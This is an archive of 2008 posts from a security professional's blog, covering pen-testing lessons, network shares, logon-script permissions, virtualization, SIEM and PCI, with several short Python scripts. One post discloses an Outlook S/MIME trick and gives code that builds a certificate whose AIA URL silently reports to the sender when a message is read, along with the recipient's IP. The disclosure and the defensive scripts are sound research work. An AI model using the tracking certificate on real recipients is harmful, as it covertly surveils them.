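For the curious, this is roughly what those desktop clients do under the hood. The sketch below posts through the XML-RPC endpoint over the shared-certificate HTTPS URL using the standard metaWeblog.newPost call; the endpoint URL and credentials are placeholders, and you still want a client (or library) that actually validates the certificate, which is exactly where Zoundry failed.

```python
import xmlrpc.client

# Placeholder endpoint: the shared-certificate HTTPS URL pointing at xmlrpc.php
endpoint = "https://securitybalance.sslpowered.com/blog/xmlrpc.php"
server = xmlrpc.client.ServerProxy(endpoint)

blog_id, username, password = "1", "augusto", "not-my-real-password"
post = {"title": "Posting over SSL", "description": "Body of the post goes here."}

# metaWeblog.newPost(blogid, username, password, struct, publish)
post_id = server.metaWeblog.newPost(blog_id, username, password, post, True)
print("created post", post_id)
```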

Monday, September 15, 2008

Good tip to fight laptop theft

Today I was in the office of a company where almost all the employees work on laptops. Everybody receives a security cable to lock the laptop to their desk and prevent theft. Then there is that old problem: "how do we educate the users to actually use the security cable?". They found an interesting way to do it there. The IT support personnel "steal" the laptops they find unprotected and leave a note in their place, something like this:

"Your laptop has not been stolen.

It has been removed from your desk to illustrate how easily it can go missing when not properly secured. [...]

Your laptop can now be picked up from [...]"

OK, I know it can cause some squeals from those I-don't-have-time-even-to-go-get-the-laptop people, but it's a nice way to make people see the risk. I like it.

Friday, September 12, 2008

And now, ScribeFire!

I've tried ScribeFire before and was not impressed by the idea of blogging from Firefox. If I had to use the browser, why not connect to wp-admin directly? Well, with my new quest for blogging clients that can use my SSL-protected xmlrpc URL, I ended up trying it again. Here I am, trying ScribeFire. It accepted the https URL without complaints, so it seems to be a good option for "secure blogging" on Wordpress blogs.

You may wonder, if you saw my last post, why I didn't stay with Zoundry. Well, for two main reasons. One is that Zoundry seems to be a bit bloated, being too slow to run from a Portable Apps environment (another of my requirements). But the death blow for that tool came when I checked whether it was using the HTTPS xmlrpc properly by putting it behind a Paros proxy. It used the HTTPS URL but didn't mention the fact that the SSL certificate was not valid for that site! Yes, Zoundry Raven is vulnerable to a simple SSL man-in-the-middle attack.

So, until now, ScribeFire seems to be the choice.


Zoundry Raven test

I'm testing Zoundry Raven calling the XML-RPC interface of Wordpress on an SSL URL. It may be an alternative for secure posting, as I can use the "shared certificate" URL for this, which can't be done with the regular wp-admin Wordpress interface. I just need to check that this thing doesn't "escape" from the specified URL to do other stuff.

Thursday, September 11, 2008

Security by economic obfuscation

This is how Chris Hoff describes the fact that vulnerability researchers don't spend time looking for holes in commercial (and expensive) software products, like virtualization platforms.

I think we have been living with this for a long time. I can mention mainframe software (even without buying hardware, researchers could run it on emulators like Hercules), ERP systems (SAP) and application servers, like Oracle's and IBM's, as software that is not receiving proper attention from vulnerability researchers. I'm pretty sure that a lot of interesting vulnerabilities would show up if more research were focused on them, but their license prices are too aggressive to allow more people to install and test them.

Simple but dreadful, part 2 - Network shares

It would be impossible to write about low hanging fruit without mentioning network shares. I say that because they are usually my favorite path to elevate privileges when I'm performing a penetration test. Among the stuff I've already found on unprotected (I mean, Everyone - Full Control) shares are:

- Source code for critical applications
- Configuration files of applications containing database credentials (VERY COMMON)
- Configuration files of applications containing Administrator-level credentials for servers (service passwords!)
- Debug logs containing a lot of sensitive information and even user credentials (SMS logs!)
- Network and systems documentation (lots of Visio diagrams)
- Personal private information (Human Resources stuff)

Network shares appear and grow on the network like tribbles. The problem starts with weak policies regulating the subject, but it grows when the infrastructure needed as an alternative to non-authorized shares is not available. If you compare companies that have a good file server infrastructure with those that are trying to save some bucks on file server megabytes, you will notice that the latter have a higher occurrence of non-authorized file shares. Non-authorized network shares fall into that "Shadow IT" category and are an easy bet for unprotected sensitive information. I can tell from experience that just by browsing network shares you can own an entire network. No need for leet exploits.

If you are just starting as a security manager, include it as one of your first steps: map and control your network shares. You need to know where they are, what is inside and who can access them.
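A crude sketch of what that "map your shares" first step can look like in practice: enumerate shares per host with the built-in Windows "net view" command and try listing each one as an unprivileged user. The host list is a placeholder and the output parsing is simplistic; treat it as an inventory aid, not a scanner.

```python
import subprocess

hosts = ["fileserver01", "ws-fin-042"]  # placeholder host list

def list_shares(host):
    """Parse 'net view \\\\host' output for disk shares."""
    out = subprocess.run(["net", "view", f"\\\\{host}"],
                         capture_output=True, text=True).stdout
    shares = []
    for line in out.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1] == "Disk":
            shares.append(parts[0])
    return shares

for host in hosts:
    for share in list_shares(host):
        path = f"\\\\{host}\\{share}"
        # If an unprivileged account can list it, it deserves a closer look.
        result = subprocess.run(["cmd", "/c", "dir", path],
                                capture_output=True, text=True)
        if result.returncode == 0:
            print(f"listable by this account: {path}")
```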

Wednesday, September 10, 2008

NAC and DLP

I was reading a comment from Shimel mentioning that NAC technology is becoming more mature every day, as we can see more 3rd party product integrations. He mentions the integration of an IPS system, which promptly made me wonder about another kind of security product: DLP.

Has anybody tried to integrate DLP and/or e-discovery products with NAC? Can you imagine the possibilities? You could build a policy where workstations with protected/sensitive information stored on them have their connectivity restricted to reduce the chances of data loss. If your computer is free of protected information, you can browse the Internet with more freedom than the guy with sensitive files on his hard disk. I wonder if anyone at Symantec is trying to do that with Vontu and their Endpoint Protection suite.
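Just to sketch the idea (nothing here maps to a real NAC or DLP product; every name is invented): the access decision at connection time would simply take the endpoint's DLP classification as one more input.

```python
def nac_profile(endpoint):
    """Pick the network profile to apply when the endpoint connects."""
    if not endpoint["av_up_to_date"]:
        return "quarantine"                 # classic NAC posture check
    if endpoint["dlp_classification"] == "sensitive-data-found":
        return "restricted"                 # internal resources only
    return "standard"                       # normal Internet access

print(nac_profile({"av_up_to_date": True, "dlp_classification": "sensitive-data-found"}))
```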

Wednesday, September 3, 2008

Best Practices - Even Dilbert knows what they mean

You can see it here. So, what are the quick wins you can get in security to go beyond best practices? Feedback would be nice.

Friday, August 29, 2008

(ISC)2 Board candidate

On Wednesday I went to the TASK meeting and learned about Seth Hardy, who is trying to get his name included on the (ISC)2 Board election ballot. I really don't know Seth, but I don't like the 1% rule from (ISC)2, where a member who wants to be a candidate for the Board must gather signatures from 1% of the members to have his name included on the ballot. I also like what TASK does, as they really seem to be like what the Brazilian ISSA chapter used to be when I was there. For that alone I think he deserves at least to be included on the ballot.

So, if you are a CISSP, please visit http://sethforisc2board.org and sign his petition!

Tuesday, August 19, 2008

Simple but dreadful, part 1 - Logon Scripts

Now that I'm back to pen testing I'm having the chance to see the mistakes admins are making nowadays. There is something very interesting that Windows domain administrators sometimes forget and that needs to be addressed, as it brings serious security implications: logon script file permissions.

Logon scripts are those little batch scripts that run when the user is logging in. They are usually stored in a share on the domain controllers called NETLOGON. The risk here is quite obvious: if I can modify your logon script, I can run commands under your user account when you log on. This is usually not possible, as the NETLOGON permissions are usually set accordingly, being writable only by domain admins.

The problem is that logon scripts are one of those complexity beasts that grow together with the organization and its network. Big organizations usually have lots of servers, file servers, domains and other stuff. The admins struggle to make users' lives a little easier by automatically mapping network drives, cleaning temporary file transfer areas and so on, and the logon scripts are a good tool for that. When doing that they sometimes need to include additional command line utilities, as the regular Windows shell doesn't have all the features needed by those very creative admins. They usually place those executables in network folders accessible by all users (of course, as the users need those files during the login process :-)), and they often give users too many rights on those folders. Remember, when you create a folder and then share it on a Windows server without changing any permissions, there is a big chance that it will end up as "Everyone - Full Control".

If you are a domain admin in an organization that extensively uses logon scripts, check them for external executable references. Tampering with logon scripts is an easy way for an insider to steal credentials and information from other users without being detected.
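That check is easy to script. The sketch below greps the NETLOGON scripts for UNC references to executables and dumps the permissions of each referenced file with the built-in icacls command, flagging entries that grant Everyone write or full control. The DC name is a placeholder and the ACL matching is simplistic (inheritance flags, localized group names and so on are ignored).

```python
import re
import subprocess
from pathlib import Path

NETLOGON = Path(r"\\DC01\NETLOGON")   # placeholder domain controller
UNC_REF = re.compile(r'\\\\[\w.$-]+\\[^\s"]+\.(?:exe|cmd|bat|vbs)', re.IGNORECASE)

for script in NETLOGON.glob("*.bat"):
    for match in UNC_REF.finditer(script.read_text(errors="ignore")):
        target = match.group(0)
        acl = subprocess.run(["icacls", target], capture_output=True, text=True).stdout
        for line in acl.splitlines():
            # (F) = full control, (M) = modify, (W) = write
            if "Everyone:" in line and any(flag in line for flag in ("(F)", "(M)", "(W)")):
                print(f"{script.name}: {target} is writable by Everyone")
```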

Friday, August 8, 2008

Portknocking, SPA and SOA

I already mentioned how I like stuff like port knocking. It can't be used as a replacement for other security measures, but it's a nice way to keep important stuff off the radar. Imagine if you had some SSH daemons remotely accessible when that OpenSSL PRNG crisis started. I saw lots of admins rushing to replace flawed keys on servers because of it. If those daemons were hidden behind some port knocking scheme, the rush wouldn't have been necessary.

Today I read some interesting stuff about SPA, or Single Packet Authentication, to protect SOA resources published on the web. I must say that it's a nice way to avoid too much attention on them. It would be nice to see this being integrated into frameworks.
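For anyone who hasn't played with it, the basic knocking idea fits in a few lines. This is only the client side, with an invented knock sequence and hostname; a real deployment (or SPA, which improves on this) adds authentication and replay protection on top.

```python
import socket
import time

KNOCK_SEQUENCE = [7000, 8000, 9000]   # shared secret sequence (illustrative)
TARGET = "ssh.example.org"            # placeholder host

for port in KNOCK_SEQUENCE:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(0.5)
    try:
        s.connect((TARGET, port))     # the SYN is enough; the port can be closed
    except OSError:
        pass                          # refused/timed-out connections are expected
    finally:
        s.close()
    time.sleep(0.2)

# A knock daemon watching the firewall logs sees the sequence and temporarily
# opens the hidden SSH port (e.g. 22) for this source IP only.
```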

Thursday, August 7, 2008

The future of mass card theft (and PCI)

The indictment of 11 people over a mass card theft is all over the news this week. I've seen reports about software developed to steal cards, war driving and other stuff, and I really don't know if it's just bad press or actual facts. There is some good info here and here.

Of course PCI will be brought into the middle of the discussion about the methods used by the group. It seems that the attacks happened a long time ago (2003), but it's interesting to look at the story with the eyes of the standard. For instance, why was it so easy for these guys to get into the cardholder data environment (CDE)? PCI has very specific rules about wireless networks, which I'm almost sure those companies were not following. Besides that, it seems that all that information was being transmitted without proper encryption.

An interesting aspect of the attacks is that they used tools developed specifically to steal card data. In the same way that there are tools being designed to identify sensitive data in order to protect it (DLP tools, e-discovery stuff), tools designed to steal that data will also be developed. I was reading on Hay's blog today about the Coreflood trojan. Criminals developed a trojan and deployed it in a clever way to avoid being detected. They used a strategy that we have been using on "penetration tests" for years: leverage access to a workstation and wait for a domain administrator to log in there to steal his password (and the keys to the kingdom). The results? According to Joe Stewart from SecureWorks, [...].

So, we can see that criminals have leveraged the ability to get into large corporate networks with highly privileged access rights. They also know what information they need to get, and the technology to look for it is improving every day. It's not hard to play the oracle and say that in the near future we will witness some huge scams performed by very organized criminal groups. Welcome to the future.

Thursday, July 31, 2008

PCI QSA

Just a quick note to say I've just heard that I'm now PCI QSA certified. Nice :-) (the test is really easy, actually... open book :-O)

Tuesday, July 29, 2008

Black Hat, Defcon, the basics

So we are finally approaching the BH/Defcon weeks, when all the new stuff is presented to the security world and the sky starts to fall once more. I'm not going to Vegas this year (I'd love to), but as I came back to working on vulnerability assessments and penetration testing I noticed that the main issue is still the basics. There is so much low hanging fruit that someone completely unaware of the vulnerabilities and attack techniques from the past 5 years would still be able to do a lot of bad stuff on a 'vanilla' corporate network. Ask yourself these 5 questions. If you can't say yes to all of them, don't sign the check for that new-miracle-black-box you are buying and do your homework to fix the basics first:

  • Can you promptly identify someone guessing passwords for administrative accounts on all your servers? (There's a small log-parsing sketch for this one after the list.)

  • Can you say for sure that there are no weak passwords for all administrative accounts on all your servers?

  • Can you say for sure that you don't have a user/password on a test box that also exists on a production server?

  • Can you say for sure that there are no shared folders on your servers with sensitive information and weak permissions settings?

  • Do you know who knows the password for (and uses) the root or Administrator account?
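For the first question, even without a SIEM you can get a rough answer from exported security logs. The sketch below counts failed logons per administrative account from a CSV export; the column layout, account list and event IDs (529 on Windows 2000/2003, 4625 on Vista/2008) are assumptions you would adapt to your environment.

```python
import csv
from collections import Counter

ADMIN_ACCOUNTS = {"Administrator", "svc_backup", "da_jsmith"}   # your own list
FAILED_LOGON_IDS = {"529", "4625"}                              # 2000/2003 and Vista/2008
THRESHOLD = 20                                                  # failures before alerting

failures = Counter()
with open("security_events.csv") as f:
    for row in csv.DictReader(f, fieldnames=["time", "host", "event_id", "account"]):
        if row["event_id"] in FAILED_LOGON_IDS and row["account"] in ADMIN_ACCOUNTS:
            failures[(row["host"], row["account"])] += 1

for (host, account), count in failures.items():
    if count > THRESHOLD:
        print(f"possible password guessing: {account} on {host} ({count} failures)")
```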
Maybe after that you can start thinking about some cool stuff from Black Hat :-)

Friday, July 18, 2008

PVLANs and DMZs

The PVLAN concept allows you to design a VLAN where each peer can communicate only with one (or more) specific peers, instead of having full n-to-n connectivity. Now, why am I not seeing people using that to deploy more secure DMZs (or simply zones)? I mean, if you'll place a web server, an SMTP server and a DNS server in your DMZ, why should they be able to talk to each other (assuming they don't have a specific need to do so)? If you do that, even with your web server compromised you still have the access restrictions from your firewall in place to protect the others, avoiding the old stepping stone problem. Is there anybody out there doing that?

"Hanging on the wall" posting of the week

I promised myself that I would avoid "look at this post from X" posts here. But today is Friday and I've just read something so perfectly written and fun that I will break that promise: read this, from Gunnar Peterson!

Thursday, July 17, 2008

CISSP value

Congrats to Andrew Hay on getting his CISSP. He does a great job of describing the value of this certification: "Due to the scope of the exam I forced myself to learn aspects of security that I had neither the reason, nor the desire, to understand. I feel that I have grown as a security professional because of my studies and hope that I can help others with the things that I have learned." That's exactly what I think about it. It won't ensure that the certified person knows everything, but he (or she) will have gone through a lot of different security subjects while studying for it. Personally it was an eye opener; I understood that security is far wider than what I originally thought when I had to study for the test.

Thursday, July 10, 2008

VMWare vulnerability

Today I read about this VMWare vulnerability on Beaker's blog. It is related to the possibility of a non-admin user on the host OS executing code on the guest OS. I read the details of the vulnerability and I understand why VMWare is saying that the described behavior is by design, and I can also see why it could be a security issue. However, issues like this just confirm my point of view that it's not feasible to try to protect the guest OS from the host. It's a matter of layers: the guest OS is just another application on the host OS. The challenges in doing that are quite similar to those faced by the AV industry.

IMHO, there is just one way to (partially) address those concerns: a single-purpose host OS that runs only guest OSes and no other software. Then a guest OS under that can run the VM environment management tools, communicating with the other guest OSes through regular (although virtualized) networking. A regular client-server application with all the proper AAA and encryption controls can be used over that network (why not IPSEC communication?). Even dedicated virtual network adapters can be used on the guest OSes to carry the traffic of the management application. The client would be installed like a regular application on the guest OSes (like VMWare Tools) and be subject to all the OS controls.

That won't help against malicious code running on the host OS, but it will reduce the possibility of that code being executed there, just by reducing the roles of the host.

Wednesday, July 9, 2008

Master dissertation test

I'm trying to finish my Master's dissertation in the next few months. In order to do that I need to test the log analysis methodology I'm proposing. The methodology is targeted at detecting insider attacks, so I need to collect logs from internal resources, which include AD domain controllers, internal e-mail systems, file and folder access audit logs, firewalls and other network devices, HTTP servers, applications, and everything else that can produce logs and indicate internal users' behavior. I would need to collect one week of logs for the tuning phase and, after that, one week of logs that will include some "simulated attacks". If there is anybody out there who can help me by providing those logs (everything will be anonymized, of course), please drop me an e-mail at augusto (at) securitybalance.com. Thanks!

Kaminsky and the new vulnerability patching world

A few years ago, it would be impossible to imagine something like what Dan Kaminsky has done with the recently uncovered DNS cache poisoning vulnerability. Although the technical details of the issue are still not public (and are probably "wicked cool", 3117, etc), the most impressive fact of the whole story is that there was a joint effort from several companies (competitors included) and organizations to release the patch in an organized way. It is the best example of responsible disclosure I've seen so far. I think this is a very good sign of how mature our field has become compared to the old days.

Congratulations (one more time) to Kaminsky. And to the participants of the joint effort too.

Thursday, July 3, 2008

Virtualization security, some thoughts about it

I was reading the post from Hoff where he writes about virtualization and the DMZ, based on a white paper from VMware. I've been reading Hoff's posts (and those of others with whom he discusses the subject) about virtualization and I thought it would be interesting to also write a little about it.

There are a lot of research results being published regarding VM security. Some try to demonstrate security issues, like malicious hypervisors or systems trying to escape their VMs to reach other VMs or even the hypervisor; some propose ways to avoid and detect those threats, and so on. I firmly believe that we can reach a very high level of security protecting the hypervisor and its role from threats coming from the VMs. That's because of the difference in "security layers". There are lots of success cases of code running in a higher privilege layer controlling code running under it, like VMS, the Java VM and others. People have been working with VM technology on mainframes for years and were able to reach a decent level of security there (the problem with the mainframe world is that it lacks its own ShmooCon, DefCon, BlackHat, etc).

There are some features being virtualized that will demand a little more care from us to ensure a good security level, like the network device roles. I believe that's not that far off either. We were able to produce fairly decent code to run on switches and routers; if we bring the same code to the VM world (would Cisco be bold enough to offer something like a "VMIOS", to run several instances of its boxes on a single big box?) we can do it there too.

The big issue that I think will remain is the security of the VM and hypervisor environment itself, I mean, the environment where that highest-level VM software is running. Based on my understanding (and I think it's almost common sense), whoever controls the hypervisor rules the VM world. VM servers are being assembled like common servers, but the VM software should be quite a bit more protected than a common application. Can you imagine running your "virtual DMZ" over a Windows 2000 server, knowing all the other software that is also running on it and can't be disabled or uninstalled? The attack surface of the server running the VMs needs to be VERY small. On mainframes the top layer (where the LPARs run) can usually be accessed only from a local console. No network access, no terminal. Nothing. I know that in the distributed computing world this can be a huge headache to manage, but we don't need to go that far. I believe the Server Core option for Windows 2008 is a good example of what to place a VM environment on, or something like a YALD (Yet Another Linux Distribution) specially prepared from scratch to be a VM server. The kernel, the VM software and nothing else. Maybe SSH for (console) remote management, but that's all. Can anyone find a reason to have Gnome or KDE running on a VM server? I can't.

Maybe I'm being a little naive when analyzing the VM problem this way. But I'm looking at the "VM" experiences from the past and I can't see challenges that go beyond that. If you start thinking about very different communication between VMs besides common vanilla networking (like sharing memory areas), maybe it's time to ask why you are trying to do that instead of placing the apps from those VMs under the same OS. And for securing basic vanilla networking on VMs, we are almost getting there.
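
To make the "kernel, the VM software and nothing else" point a bit more concrete, here is a rough check I would run on such a host. It is only a sketch of mine, assuming the psutil library and an allowlist that you would adapt to your hypervisor's actual daemons (the names below are placeholders):

import psutil

ALLOWED = {"sshd", "vmware-hostd"}   # placeholder names; adjust to your VM software

def listening_processes():
    # Every process with a listening inet socket is part of the attack surface.
    for conn in psutil.net_connections(kind="inet"):
        if conn.status == psutil.CONN_LISTEN and conn.pid:
            yield conn.laddr, psutil.Process(conn.pid).name()

unexpected = [(addr, name) for addr, name in listening_processes() if name not in ALLOWED]

if unexpected:
    print("Unexpected listeners on a supposedly minimal VM host:")
    for addr, name in unexpected:
        print("  %s on %s:%s" % (name, addr.ip, addr.port))
else:
    print("Only the expected services are listening.")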

Monday, June 30, 2008

Unauthorized reading confirmation on Outlook

Last month, during an exam item writing workshop for the CISSP-ISSAP certification, I got an idea about how a malicious e-mail sender could try to get a reading confirmation unseen by the recipient, including the recipient's IP address. I was talking about S/MIME messages and thought about the signature validation process, where some of the steps may require external information (like a CRL) to be accessed. The interesting part is that the location of this information can be included in the message itself, as the PKCS#7 package can also include the certificate used to generate the signature.

I went into the Microsoft documentation about the validation process in Outlook, and found this (reference: http://technet.microsoft.com/en-us/library/bb457027.aspx#EKAA):

"When the first certificate in the chain is validated, the following process takes place.

1. The chaining engine will attempt to find the certificate of the CA that issued the certificate being examined. The chaining engine will inspect the local system certificate stores to find the parent CA certificate. The local system stores include the CA store, the Root store, and the Enterprise Trust store. If the parent CA certificate is not found in the local system certificate stores, the parent CA certificate is downloaded from one of the URLs available in the inspected certificate's AIA extensions. The paths are built without signature validation at this time because the parent CA certificate is required to verify the signature on a certificate issued by the parent CA.

2. For all chains that end in a trusted root, all certificates in the chain are validated. This involves the following steps.
   * Verify that each certificate's signature is valid.
   * Verify that the current date and time fall within each certificate's validity period.
   * Verify that each certificate is not corrupt or malformed.

3. Each certificate in the certificate chain is checked for revocation status. The local cache is checked to see if a time valid version of the issuing CA's base CRL is available in the cache. If the base CRL is not available in the local cache, or the version in the local cache has expired, the base CRL is downloaded from the URLs available in the CDP extension of the evaluated certificate. If available, it is confirmed that the certificate's serial number is not included in the CA's base CRL."

As described, the recipient's system will try to fetch the CA certificate from a URL specified in the signer's certificate, which is embedded in the signed message. A specially crafted certificate can be generated with an AIA (Authority Information Access) extension containing a URL controlled by the malicious sender. By doing that, the sender will know immediately when the recipient reads the message in Outlook, even if the certificate is untrusted (so you don't need a certificate from a trusted CA to be able to do this). I performed some tests that confirmed this scenario. Other e-mail clients, like Mozilla Thunderbird and Lotus Notes, did not present the same behavior. It seems that only Outlook implements this part of RFC 2459. It's behaving correctly according to the RFC, but I believe the user should have the ability to disable it.
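
For anyone who wants to reproduce the test, this is roughly how such a certificate can be crafted. The snippet below is only a sketch of mine using the Python cryptography package (an assumption on my part; any tool that lets you set the AIA extension, OpenSSL included, works just as well), pointing the AIA "CA Issuers" URL at a web server controlled by the sender:

import datetime
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import AuthorityInformationAccessOID, NameOID

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"smime-test")])

# The AIA extension carries the URL that Outlook will fetch during chain building.
aia = x509.AuthorityInformationAccess([
    x509.AccessDescription(
        AuthorityInformationAccessOID.CA_ISSUERS,
        x509.UniformResourceIdentifier(u"http://www.securitybalance.com/ca.html"),
    )
])

cert = (
    x509.CertificateBuilder()
    .subject_name(name)
    .issuer_name(name)                      # self-signed: an untrusted cert is enough
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(datetime.datetime.utcnow())
    .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=30))
    .add_extension(aia, critical=False)
    .sign(key, hashes.SHA256())
)

with open("smime-test.crt", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.PEM))

# Signing an S/MIME message with this certificate is a separate step.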

Here is a sample of a web access from the recipient of a message crafted like that. In this case, the AIA address included in the certificate was pointing to the "http://www.securitybalance.com/ca.html" URI.

10.10.10.31 - - [12/May/2008:15:47:43 -0400] "GET /ca.html HTTP/1.1" 200 116 "-" "Microsoft-CryptoAPI/5.131.2600.3311"
(anonymized IP address)

Wednesday, June 25, 2008

SIEM dead, time for search?

This is what Raffy is saying: "Some of the problems I see with Security Information Management are (the first four are adapted from the Gartner IDS press release):

  • False positives in correlation rules

  • Burden on the IS organization by requiring full-time monitoring

  • A taxing incident-response process

  • An inability to monitor events at rates greater than 10.000 events per second

  • High cost of maintaining and build new adapters

  • Complexity of modeling environment
However, the biggest problem lies in the fixed event schema. SIMs were built for network-based attacks. They are good at dealing with firewall, IDS, and maybe vulnerability data. Their database schema is built for that. So are the correlation rules. Moving outside of that realm into application layer data and other types of logs can get hard. Fields don’t match up anymore and the pre-built correlation rules don’t fit either. We need a new approach. We need an approach that can deal with all kinds of data. An approach that deals with multi-line messages, with any type of fields, even with entire files as entities. There is a need for a system that can collect data at rates of 100.000 events a second and still perform data analysis. It needs to support large quantities of analytical rules, not just a limited set. The system needs to be easy to use and absorb knowledge from the users. The solution is called IT search."

I really agree on the value of IT search, but I believe there is some confusion over the main objectives of each tool. If you are thinking about data mining and deeper analysis of log data, maybe searching really is a better approach. What I really question is using search for alerting purposes. I don't think search-based architectures for a "log analysis IDS" scale.

Raffy hits the point when he mentions that SIEMs target network devices. I have seen people working to integrate logs from different sources (applications) into those tools having a hard time with the vendors, who simply can't understand the notion of using log data other than routers, firewalls and IDSes.

Of course, logs from applications are not as simple as logs from network devices. Maybe that's why the vendors are avoiding them. They want to sell their products as plug-and-play boxes, and you can't have a plug-and-play installation when dealing with custom applications. What I believe is that an effective SIEM (or, if you don't want to define the technology behind it, a consolidated log monitoring) deployment is more similar to an ERP (or Identity Management) deployment than to an antivirus deployment. If vendors improved their products not by including more supported log formats but by delivering a fast and easy way to build log parsers, together with a flexible model for the entities that the tool and its rules can work with, it would be much easier to deploy them, deliver better value and integrate more log sources.

The IAM tools evolved the same way. From the beginning they could work with LDAP, Active Directory, RACF and other well-known identity repositories. The challenge for adopters, however, was not integrating those but the old legacy applications. The IAM products with the best "universal adapters" are the ones that generate the best results. I think it will be the same for SIEMs. All of them can work with CEE or something similar, but those with easy (and intelligent) tools to accept different sources will bring more benefit to the customers. Even search technology can be used to do that.

So, don't blame the SIEM tools, but their architects. When these people understand where the biggest value of those tools is, we will start to see huge benefits from them.
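
To illustrate what I mean by a fast and easy way to build log parsers on top of a flexible entity model, here is a minimal sketch (my own, not any vendor's API): each source is just a named regex, and whatever fields it captures become that event's attributes, so new sources don't require schema changes.

import re

PARSERS = {
    "apache_access": re.compile(
        r'(?P<src_ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
        r'(?P<status>\d{3}) (?P<bytes>\S+)'
    ),
    # integrating a custom application log is just one more named pattern
    "payroll_app": re.compile(
        r'(?P<time>\S+ \S+) user=(?P<user>\S+) action=(?P<action>\S+)'
    ),
}

def parse(source, line):
    match = PARSERS[source].match(line)
    if not match:
        return None
    event = {"source": source, "raw": line}
    event.update(match.groupdict())   # flexible schema: fields vary per source
    return event

print(parse("apache_access",
            '10.10.10.31 - - [12/May/2008:15:47:43 -0400] "GET /ca.html HTTP/1.1" 200 116'))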

Wednesday, June 18, 2008

Open Group Risk Management "taxonomy"

I was reading this:

"With a goal of getting IT professionals to use standard terminology and eliminate ambiguity in expressing important risk-management concepts, the Open Group is finalizing a 50-page compendium of "risk-management and analysis taxonomy."

The Open Group Security Forum's risk taxonomy of about 100 expressions will not only address seemingly simple words such as threat, vulnerability and risk, but less common terms such as control strength."I was thinking, why these guys are doing it when there are stuff like ISO Guide 73, ISO27005 and ISO27000 published or in their way to be published?

This is why we asked so much for Server Core

This study from Jeff Jones' blog shows why the Server Core feature of Windows Server 2008 was so anticipated by security professionals. We can see a 40% reduction in vulnerability numbers for a server running Windows if it were using something like Server Core. My main concern now is whether software providers will enable their products to run on a Server Core server. It would be a shame to have this feature and not be able to use it because some piece of software demands Solitaire to be installed in order to run :-)

Friday, June 13, 2008

I'm back

I'm back. OK, almost. Today I spent two hours reading lots of accumulated RSS news, blog postings and other things. I was glad to see that nothing very exciting happened during the last few weeks, while I was moving to Toronto and wasn't able to follow the news and post on the blog. Now my life is slowly turning into something we may call "routine", so I think it's time to resume the activities of this blog.

First, it seems there is some good stuff from Mogull and Schneier. I'll read their posts as soon as possible to see if there is something I can add.

Today I went to Infosecurity Toronto. I was impressed by how small the exhibition was. Someone told me that the owners of the event did something weird on the marketing side, starting the negotiation of space and sponsorships too late. Still, it was good to go there and take a quick look at the local security market. As always, conferences are those places where there are lots of vendors and not a single customer :-)

I'm still looking for a job here. I'm having some good conversations with some pretty interesting companies, and I hope to be employed by the end of this month.

One interesting thing to mention is that during my last week in Brazil I was hacked. Yes. I'm not ashamed to say that, especially because I'm aware that security professionals draw more attention from potential attackers. What happened is that I made two mistakes related to my personal password management "policy". I was using the same password on services I considered low-risk. The first mistake was treating three services that actually carry higher risk as "low risk" (I couldn't even remember I was using that password on them - it was something very automatic for me), and the second was using that password on a very targeted and potentially insecure service. There is a small group of self-proclaimed "hackers" in Brazil trying to cause problems for key names in the country's information security community. Unfortunately, I am on that list. As I was caught in the middle of my relocation I was unable to follow a lot of the incident response procedures I would have liked to, but I'm aware that some of the others being targeted by this group are doing so. I won't talk too much about it, as it seems that what they are really looking for is people talking about them. This is, however, a good reminder that as a security professional I need to be a little more paranoid about security in my personal stuff.

That's all for now. I hope to be able to find more interesting stuff to write about again. I'm keeping my personal "in Portuguese" blog updated with my impressions about my new city, but this one needs some special care too. I'll try harder.

Thursday, June 5, 2008

I didn't quit the blogging stuff

I know it has been ages since I last wrote here, but I'm finally putting together what I need here in Toronto and I believe that in a few days I'll resume not only my blogging but also my Twitter presence. Don't unsubscribe, dear readers!

Friday, May 16, 2008

The discussion about GRC

Good information will always come from discussions between people like Gunnar Peterson, Richard Mogull, Chris Hoff and Alan Shimel. This time the target is GRC tools. It started with Peterson, was commented on by Hoff and Mogull, and followed by Shimel. There is space for GRC tools in the market, but it is really risky to change a security product roadmap just to rebrand it as GRC. Axur ISMS is a very nice tool to oversee and manage a security program, leading to compliance results. However, it will never work without all the processes and tools that lie beneath the strategic layer. How could a tool like that replace, let's say, an antivirus or even a firewall? The way all those tools are being managed and how they are addressing risks is information, and that information needs to be properly managed. This is where GRC products can help. If you don't have tools and processes to be managed, forget about GRC. Do the basics first.

Debian

Debian: transforming public key encryption into shared key encryption.

Thursday, May 15, 2008

Vulnerability Numbers, Q1 2008

Jeff Jones has just published some pretty interesting vulnerability numbers for Q1 2008. OK, I know the source is Microsoft, but the numbers and their meaning are very well documented, in my opinion. I'm one of those who believe these numbers show the results of Microsoft's impressive security initiative. It's also good to see the numbers for vulnerabilities in Apple software, which also show the results of a security posture (a very crappy one, indeed). The Linux numbers are not a surprise to me. The problem this week for Linux is the very, very ugly vulnerability in the Debian OpenSSL PRNG. Reading how it came to be introduced into the code shows that the same reasoning open source defenders use to argue it is more secure can also make the software less secure. Interesting.
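
A quick note on why that PRNG bug is so ugly: the patched code ended up with essentially only the process ID feeding the entropy pool, and PIDs are a tiny space. The toy sketch below is my own illustration of the consequence, not the actual OpenSSL code: when the only "entropy" is a PID, every key ever generated can simply be enumerated.

import hashlib

MAX_PID = 32768   # typical default PID range on Linux

def weak_key(pid):
    # stand-in for "derive a key from a PRNG seeded only with the PID"
    return hashlib.sha1(str(pid).encode()).digest()

victim_key = weak_key(1337)               # the victim generates a key in some process

candidates = {weak_key(pid) for pid in range(1, MAX_PID + 1)}
print("keyspace size:", len(candidates))  # ~32k keys, trivially searchable
print("victim key recoverable:", victim_key in candidates)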

Saturday, May 10, 2008

(ISC)2 exams

